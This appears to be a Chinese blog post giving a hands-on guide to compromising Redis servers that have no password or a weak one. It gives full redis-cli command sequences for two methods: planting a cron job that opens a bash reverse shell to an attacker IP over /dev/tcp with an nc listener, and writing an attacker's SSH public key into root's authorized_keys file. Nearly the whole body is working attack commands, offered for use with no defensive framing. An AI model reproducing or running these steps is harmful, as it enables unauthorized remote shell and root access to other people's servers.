redis弱密码漏洞利用
2024-08-31 13:34:18
背景:
redis无认证,或者弱密码,可以成功连接到redis服务器
反弹shell拿到的权限取决于redis的启动账号
操作:
1. Centos7安装redis客户端
#yum install redis --查看是否有redis yum 源
#yum install epel-release --下载fedora的epel仓库
# yum install redis -- 安装redis数据库
【漏洞利用方法1 写crontab,反弹shell】
2.连接redis服务器,执行命令
#redis-cli -h 10.1.1.2 -a 123456 //如果没有密码,不用添加-a参数
10.1.1.2:6379> config set dir /var/spool/cron
OK
10.1.1.2:6379> config set dbfilename root
OK
10.1.1.2:6379> set xxoo "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1\n\n"
10.1.1.2:6379>save
OK
上面的方法是需要先连接到redis服务器,然后再执行命令,也可以直接执行命令,无需连接
#echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1\n\n"|redis-cli -h 192.168.118.129 -a 123456 -x set 1
#redis-cli -h 192.168.118.129 -a 123456 config set dir /var/spool/cron/
#redis-cli -h 192.168.118.129 -a 123456 config set dbfilename root
#redis-cli -h 192.168.118.129 -a 123456 save
3.在 10.1.1.1上执行
#nc -l -p 1234 -vv //监听1234端口
很快就能收到shell
【漏洞利用方法2 写authorized_keys 实现无密码登录】
执行命令如下:
127.0.0.1:>flushall
OK 127.0.0.1:>config set dir /root/.ssh/
OK 127.0.0.1:>config set dbfilename authorized_keys
OK 127.0.0.1:>set xxoo "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxna91qSLsy9sbYSZNYMpe0root@localhost.localdomain\n\n"
OK 127.0.0.1:>save
OK
然后ssh 连接目标服务器即可
最新文章
- 1Z0-053 争议题目解析687
- 解决VS2015安装Android SDK 后文件不全及更新问题
- yii2 的request get pos请求 基本用法示例
- bootstrap的下载
- window.showModalDialog的简单实践
- 抢小米软件html版(简单有效)
- Cocos2d-x解析XML文件,解决中文乱码
- Android 滑动效果入门篇(一)—— ViewFlipper
- 快排找第k大模板
- php大力力 [023节]CREATE TABLE创建新表sql写字段备注(2015-08-27)
- “锁定”语句 lock(C# 参考)
- curl命令学习(转载的)
- echarts 折线柱形上方显示自定义格式数据
- android 写文件权限
- jquery next nextAll nextUntil siblings的区别
- CentOS搭建PHP服务器环境(LAMP)
- 深圳尚学堂:JavaScript的常见面试题
- linux命令和知识点
- adboost方法(转载)
- 6-9-哈夫曼树(HuffmanTree)-树和二叉树-第6章-《数据结构》课本源码-严蔚敏吴伟民版